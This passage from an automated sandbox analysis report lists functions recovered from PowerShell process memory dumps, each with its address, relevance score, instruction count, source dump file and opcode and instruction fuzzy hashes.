                                                              • Opcode Fuzzy Hash: daddc53f357fff58fe02820565168d3c140ef291b87343248917803dd3bb173d
                                                              • Instruction Fuzzy Hash: 24C260B4A003149FEB64DF64CC54BEAB7B2BB85304F1084A9D8196B794CB75ED82CF91
                                                              Function 077548E8 Relevance: .9, Instructions: 904COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14490d908eb8ef8e621928cb3aa17443eecec4c03776561047fb600b2a821da9
                                                              • Instruction ID: f7cd52bbd7ff0fa1485c1b6c837d3cb860abfb81d29cd08920af981e490abf41
                                                              • Opcode Fuzzy Hash: 14490d908eb8ef8e621928cb3aa17443eecec4c03776561047fb600b2a821da9
                                                              • Instruction Fuzzy Hash: 5C827DB4A00215DFEB20DF54C950BAEB7B2BB89304F10C9A9D91A6B754CB71ED82CF51
                                                              Function 0775570A Relevance: .9, Instructions: 888COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7450f042a3f31751ef49985935ae22bc08a03c86b83e00fe3d0916409490e59
                                                              • Instruction ID: db8b73e9062b6bb5164a0d070feaf04c579a754327a4643e35dde8eb7208aec9
                                                              • Opcode Fuzzy Hash: b7450f042a3f31751ef49985935ae22bc08a03c86b83e00fe3d0916409490e59
                                                              • Instruction Fuzzy Hash: F1828CB4A00214DFEB60DF54C950BAEB7B3BB89304F10C9A9D91A6B754CB71AD82CF51
                                                              Function 077534B4 Relevance: .9, Instructions: 886COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0fe103ef54a6f87935d37661e27dd527421d7eafc32d5b982b579586813bdd0
                                                              • Instruction ID: 514182bfbe853d784ab29ada261a6b95f5cc7f405a7032f6c3f8fc0e47502fd9
                                                              • Opcode Fuzzy Hash: a0fe103ef54a6f87935d37661e27dd527421d7eafc32d5b982b579586813bdd0
                                                              • Instruction Fuzzy Hash: 828282B4A10204DFE724DF98C440B9ABBB2FB49348F218559D9156F796CBB2ED42CF81
                                                              Function 077548E3 Relevance: .8, Instructions: 814COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a840570c0308c3f8a9aaa4dc2577aa894f90d8830388e4ee0365905568cc41ca
                                                              • Instruction ID: 2b67fefaa3f4c7aea1a499ec0cedf1816c0597d1b144b14eb86d7e5d55b28d8f
                                                              • Opcode Fuzzy Hash: a840570c0308c3f8a9aaa4dc2577aa894f90d8830388e4ee0365905568cc41ca
                                                              • Instruction Fuzzy Hash: C1727CB4A00215DFEB20DF54C950BAEB7B2BF89304F10C9A9D91A6B754CB71AD82CF51
                                                              Function 077558DF Relevance: .6, Instructions: 647COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 13e5987ce12f89407a31695dc3f2aff1881c3c79622efb4205f490c81c829da2
                                                              • Instruction ID: 1ce2170d8531a1a4f3caf2dafdff9f2581f84452dd54ffa66e9cea675334670f
                                                              • Opcode Fuzzy Hash: 13e5987ce12f89407a31695dc3f2aff1881c3c79622efb4205f490c81c829da2
                                                              • Instruction Fuzzy Hash: 1C526DB4A00214DFEB60DF54C950BAEB7B3BB85304F20C9A9D91A6B754CB71AD828F51
                                                              Function 07751278 Relevance: .6, Instructions: 626COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4c0e30b26254eeceff6b4373098657c39d9b602c898012771bdc3f0a21f1119
                                                              • Instruction ID: 6895f448e625f941e4b5713e9cb44984fb6dda0dc8f812060aadd63a11a1d402
                                                              • Opcode Fuzzy Hash: c4c0e30b26254eeceff6b4373098657c39d9b602c898012771bdc3f0a21f1119
                                                              • Instruction Fuzzy Hash: EA32B0B0B00209DFD714DB98C440BAEBBB2AF86715F55C469E9059F391DBB2DC42CB92
                                                              Function 0775D7B2 Relevance: .6, Instructions: 624COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74854491fc00a377201e7752196ad435d5a4ed7aa3639803b1120e864708ad7d
                                                              • Instruction ID: 3659f918972f91a2abb5ce12863703731a7aa207b88aa6ef1598f6f9b088ac72
                                                              • Opcode Fuzzy Hash: 74854491fc00a377201e7752196ad435d5a4ed7aa3639803b1120e864708ad7d
                                                              • Instruction Fuzzy Hash: 81427074B003149FEB64DF54C890BAAB7B2BB85304F10C4A9D81A6B755CB75ED828F51
                                                              Function 077586B8 Relevance: .6, Instructions: 598COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f2977eda3d4a4174a239a4cde94b5c45508d0039d0c7efb3ea694bcc5894e66
                                                              • Instruction ID: 29fdab7d6962cd3f64f7b533ba0b6c24581f572791e0e4158911b30306721b52
                                                              • Opcode Fuzzy Hash: 3f2977eda3d4a4174a239a4cde94b5c45508d0039d0c7efb3ea694bcc5894e66
                                                              • Instruction Fuzzy Hash: CF125BB1B14306DFDB159B6888007BABBA6AFC6251F1488BADD05CB351DB71DC42C7A3
                                                              Function 04C09B50 Relevance: .6, Instructions: 581COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2017a175ee97b8935df5c6a62b79d8bde6614f695f42cf29fefcb4344bb6e29
                                                              • Instruction ID: 86082403d7c53ccd93f250d486da5a1e0195432ac66ccc36fc08d09ef48c0812
                                                              • Opcode Fuzzy Hash: b2017a175ee97b8935df5c6a62b79d8bde6614f695f42cf29fefcb4344bb6e29
                                                              • Instruction Fuzzy Hash: 4042F674A01218DFDB15CFA8D484A9DFBB2BF89314F25C159E805AB3A6C771ED81CB90
                                                              Function 0775DA44 Relevance: .4, Instructions: 441COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdcc2d68c7f898f2ddf44c8e6253b3b8e430828abfccd2ca3ce488488fe23781
                                                              • Instruction ID: 23255638a940dd2e837c7f5ffa2f4f3599452a883d4e41f6dfba0149ac4de36f
                                                              • Opcode Fuzzy Hash: bdcc2d68c7f898f2ddf44c8e6253b3b8e430828abfccd2ca3ce488488fe23781
                                                              • Instruction Fuzzy Hash: DC124FB0A00215DFEB70DF14C880BA9B7B2BB46344F1184EAD959AB750DBB1EE81CF51
                                                              Function 0775D839 Relevance: .4, Instructions: 437COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28d8d00b11cce9201223aab295128a32aaf53dbd98034ac53fa7a3d2e41581e9
                                                              • Instruction ID: 921c006c93b365f8ee9871dc6ae84fa5f75e80e7a95df23e32c0ebdb3f7d1021
                                                              • Opcode Fuzzy Hash: 28d8d00b11cce9201223aab295128a32aaf53dbd98034ac53fa7a3d2e41581e9
                                                              • Instruction Fuzzy Hash: 0C122EB4A00215DFEB74DF14C880BAAB7B2BB46344F1184E9D919AB750DBB1EE81CF51
                                                              Function 04C07424 Relevance: .3, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 060f006ca08638cd4df9199e1c79cbf09a9fa6a333ff3be2a4f50805ec571936
                                                              • Instruction ID: 0d391ed9d06cd56bef0fded1b9d65199dab46c97fb04ffa767c56b053e96607c
                                                              • Opcode Fuzzy Hash: 060f006ca08638cd4df9199e1c79cbf09a9fa6a333ff3be2a4f50805ec571936
                                                              • Instruction Fuzzy Hash: 07A15F31A00208DFDB18DFA9D944A9DBBB3FF84314F158559E806AB395DB34BD4ACB90
                                                              Function 04C0F49C Relevance: .3, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4dcf7f6a26a468f3373988d08c69c03a0c8f542f4c848803486d22441410de25
                                                              • Instruction ID: 625cff3ce1b1a97f031de4477d0b293fd1c2a0f53756174d40a82809482e6991
                                                              • Opcode Fuzzy Hash: 4dcf7f6a26a468f3373988d08c69c03a0c8f542f4c848803486d22441410de25
                                                              • Instruction Fuzzy Hash: 42B15E70E00209CFDB20CFA9D88579DBBF2AF88754F14852DD815E7294EBB4A985CB81
                                                              Function 04C02AA0 Relevance: .2, Instructions: 208COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7707daf29b299e9dfde0abd6f23a020740021cc092cc8179c79a2895cb18e556
                                                              • Instruction ID: 9748720bc159a221cc51bc3cc1efdda34aa23c08cd22650147cdc695e7a9a31e
                                                              • Opcode Fuzzy Hash: 7707daf29b299e9dfde0abd6f23a020740021cc092cc8179c79a2895cb18e556
                                                              • Instruction Fuzzy Hash: 6E918E74A006098FDB15CF58C4D8AAEFBB2FF89310B248599D815AB3A5C736FD51CB90
                                                              Function 07751E80 Relevance: .2, Instructions: 192COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dcfe9a3b02b6906ac6350419252f5a17b58f81a3682ac628f34df8d2c02c31d9
                                                              • Instruction ID: 92466667ea07a3b0c68535ffede13e283837d166934ecf75c8b9f914159b188c
                                                              • Opcode Fuzzy Hash: dcfe9a3b02b6906ac6350419252f5a17b58f81a3682ac628f34df8d2c02c31d9
                                                              • Instruction Fuzzy Hash: 30517FF170530A9FD7209B698800766BBE5AFC6252F64896ADD09DB392DBB1C841C391
                                                              Function 04C07CDE Relevance: .2, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ef6d006e07d01a92d8d703f6a86e109cc7d45cf52af7f64bf37c62ef9f116b5
                                                              • Instruction ID: f210beabf1b173f725df2e27b17178eb05196ea867dac303aadeb0d4def5467e
                                                              • Opcode Fuzzy Hash: 1ef6d006e07d01a92d8d703f6a86e109cc7d45cf52af7f64bf37c62ef9f116b5
                                                              • Instruction Fuzzy Hash: F3713B70E01209DFDB18DFA5D884AADBBF2BF88304F148429D412AB790DB35BD46CB55
                                                              Function 07750548 Relevance: .2, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: da20703c980514af7e89113076d8fb1df0e473f044158d9997cf664d8e111f3f
                                                              • Instruction ID: 68dbefa8d959f9ef17dd03b7a74f5ce0f5e1afaea91c8a5600c2d7dc1ebe50b7
                                                              • Opcode Fuzzy Hash: da20703c980514af7e89113076d8fb1df0e473f044158d9997cf664d8e111f3f
                                                              • Instruction Fuzzy Hash: 8A5126F1704306DFDB256B7488106BA7BA2EFC2355F24886ADD02DB295DE71C841C7A2
                                                              Function 07750C78 Relevance: .2, Instructions: 175COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3647c669ca68b8bfd2e590f82aaf46ec0adc13cbabd919dd24203ef5160ee514
                                                              • Instruction ID: 71d119dc12cc3b9b594f7245d19ca7358ef56973536b61062b8674615a9d293a
                                                              • Opcode Fuzzy Hash: 3647c669ca68b8bfd2e590f82aaf46ec0adc13cbabd919dd24203ef5160ee514
                                                              • Instruction Fuzzy Hash: C0518DB17043469FDB215B788800BBBBBA2EFC2351F14887BD945CB391DAB1E851C7A1
                                                              Function 04C07B5B Relevance: .2, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0232c281598380e8fa5b2c69e600ea0e95fb32a11ad366b60a98f6c4b5e0e63c
                                                              • Instruction ID: 2ac1fa6c94abce0e5f9645a252aff24b334d8637c6febfaafefb05fc61810e87
                                                              • Opcode Fuzzy Hash: 0232c281598380e8fa5b2c69e600ea0e95fb32a11ad366b60a98f6c4b5e0e63c
                                                              • Instruction Fuzzy Hash: 3B618D30A01609CFDB18DF68C884A9EBBB2FF89314F15C569D4069B791DB75BD46CB80
                                                              Function 0775869C Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10050f094fcae1e6eb0c0181bcbdb043a9d115c26a25df9885ce68ba7f09997f
                                                              • Instruction ID: ab17e72332094ed21b74ec8ff6a4c7031b9adcedd29cb5645392eb8af9b19f7f
                                                              • Opcode Fuzzy Hash: 10050f094fcae1e6eb0c0181bcbdb043a9d115c26a25df9885ce68ba7f09997f
                                                              • Instruction Fuzzy Hash: A1412AF1B10201DFDB149F6489406767BB2EF86294F1988BADC01DF751D772E982CBA2
                                                              Function 04C07901 Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc7b44437992f98f97a2d51835cac4cc89b8b6b220b6bde2dee89ffc7cf91e68
                                                              • Instruction ID: ce14a47080379ed02121a5da065856bd7c642d822662b2e1030123c627f36dc4
                                                              • Opcode Fuzzy Hash: cc7b44437992f98f97a2d51835cac4cc89b8b6b220b6bde2dee89ffc7cf91e68
                                                              • Instruction Fuzzy Hash: E4415F31B052059FDB19DF74C5586AA7BB3EF89750F098069E406EB7A0DB34AD42CB90
                                                              Function 07750B00 Relevance: .1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9be0411475dcbd2ea18b66ed4b7a6a307ffd5cd16ae835a90a2975bf7c6cffe
                                                              • Instruction ID: 863b2248461309978264c3cc837c81a20174aa34f4b01da46a98e74dc11aaf7e
                                                              • Opcode Fuzzy Hash: b9be0411475dcbd2ea18b66ed4b7a6a307ffd5cd16ae835a90a2975bf7c6cffe
                                                              • Instruction Fuzzy Hash: 6E3113B17003068BDB14AB798C403FEB7A6AFC6355F20882ADC4ADB741EB72D941C791
                                                              Function 04C07918 Relevance: .1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ba41d4ffd41be670af4b38dd1fc80ab68480abbea3e1b6d87a8431d631b52f2
                                                              • Instruction ID: c41ab2d496b7018efe17a178b0b0ad2c4d3dd45391be432be0d4704c955394b6
                                                              • Opcode Fuzzy Hash: 7ba41d4ffd41be670af4b38dd1fc80ab68480abbea3e1b6d87a8431d631b52f2
                                                              • Instruction Fuzzy Hash: E3413E31B012058FDB18DF74C558AA97BB7EF88710F188468E406AB3A0DB34AD41CB94
                                                              Function 04C02BB0 Relevance: .1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a38c65f79cf68ce20d77aea953dc64c80a432cd3a5e61659778d1d6c65d3a6d5
                                                              • Instruction ID: 603998d8456d80693297f821560011573b61a79e335aff173adff797088420f6
                                                              • Opcode Fuzzy Hash: a38c65f79cf68ce20d77aea953dc64c80a432cd3a5e61659778d1d6c65d3a6d5
                                                              • Instruction Fuzzy Hash: 02417974A006058FDB05CF58C4D8AAAFBB2FF49310B118699D815AB3A5C336FD51CFA0
                                                              Function 077560E8 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1c07997b88c2e6faa390a8ed851d79caed4f547e22226d6389e979d1df37bd
                                                              • Instruction ID: 008063218cfd2a9ea77f6331d3e129ade51a6bced40eb578d335d55b95135888
                                                              • Opcode Fuzzy Hash: 6a1c07997b88c2e6faa390a8ed851d79caed4f547e22226d6389e979d1df37bd
                                                              • Instruction Fuzzy Hash: E431F370B002049BE700ABA4C850FAFB7A3EFC6714F208424E9156F791CFB2DD428B92
                                                              Function 04C096A8 Relevance: .1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00ea733d81317cbb540c45b8c4a82496edb697705768fe42134ac39cfb41def9
                                                              • Instruction ID: 2d0ccd32fa8e2b1639ce09faa4824c65f384d7f4ada830b81644927261fac88a
                                                              • Opcode Fuzzy Hash: 00ea733d81317cbb540c45b8c4a82496edb697705768fe42134ac39cfb41def9
                                                              • Instruction Fuzzy Hash: 62317074A093859FD702DF68C9A099ABFB0BF4B210B0941D6D485DB363C624ED45CBA2
                                                              Function 07751150 Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b892db6da1f348ddf5f624d0eec9051dec0dac6bccaa3ca69046d56e83b0d693
                                                              • Instruction ID: c6969cb19948e198cb073b2cc3d215cd28f8c062015bd92851a7be1ef1f1a003
                                                              • Opcode Fuzzy Hash: b892db6da1f348ddf5f624d0eec9051dec0dac6bccaa3ca69046d56e83b0d693
                                                              • Instruction Fuzzy Hash: D1214CB531030EDBEB24A7A98800B7767969BC2753F648C6AD805DB381DDB5C841C361
                                                              Function 07751020 Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88415744472905aa52878ff1cbfdbac7690e7291032225049c0b2cc24a3ff86b
                                                              • Instruction ID: e4da01f53e00f860f40c6a4566527443c6fd190dff7489ed4de7905f0d13c51d
                                                              • Opcode Fuzzy Hash: 88415744472905aa52878ff1cbfdbac7690e7291032225049c0b2cc24a3ff86b
                                                              • Instruction Fuzzy Hash: C6217EB530030ADBEB2467A64850737B796ABC5752F74C829E90ADB3C4DDB5C84193A0
                                                              Function 07751000 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f6fb7297e73bde1283863f76203ee587b4832282731af0fde58bfc03627c860
                                                              • Instruction ID: 296beb3968f1a54b3f2855ea767cd6aa0df785a8c6a0e89d18d6ba61b7afee02
                                                              • Opcode Fuzzy Hash: 6f6fb7297e73bde1283863f76203ee587b4832282731af0fde58bfc03627c860
                                                              • Instruction Fuzzy Hash: BB21CDF53083CAAFFB111B6248607727FA59F87241F788457E944DB2C2C9A98D459371
                                                              Function 07751134 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d330df46f91185f2b8b61c06100c8c473fb0f5bd004991633d9b89743f398db8
                                                              • Instruction ID: 33f48347ad99842f13c4c0c4561c202a92ba17e074d0bd3d64da5df0dc8f9b53
                                                              • Opcode Fuzzy Hash: d330df46f91185f2b8b61c06100c8c473fb0f5bd004991633d9b89743f398db8
                                                              • Instruction Fuzzy Hash: 8E213BB570838AAFEB218B664C007723FA59FC3752F5589A7EC40DB6C2D5A98C45C361
                                                              Function 07751E64 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92da9dcf778425d12213fbc5baf5c25f66ade44f9e98897248dbc4e9352d60c2
                                                              • Instruction ID: c60a275811e388c4d66d2c99f36223ea73a75c362ec2bd618eba8a5c751edee0
                                                              • Opcode Fuzzy Hash: 92da9dcf778425d12213fbc5baf5c25f66ade44f9e98897248dbc4e9352d60c2
                                                              • Instruction Fuzzy Hash: A411E2F190530BDFC7208F6888007A6BBF0EF86293F99856ADC18DB251D7B4C981CB91
                                                              Function 04C09697 Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 603a889493669228e46e086b92c217e61b75f29d50a030a21557f13d3fc27256
                                                              • Instruction ID: 0939dc9fbdde20d0d6ab82e5614557d5391776bb6407610b7560001e31c6ad68
                                                              • Opcode Fuzzy Hash: 603a889493669228e46e086b92c217e61b75f29d50a030a21557f13d3fc27256
                                                              • Instruction Fuzzy Hash: 24212E74A04209DFCB00CF98D980AAEFBB5FF89310B158499E909AB352C731FD51CBA1
                                                              Function 04C0EEC3 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
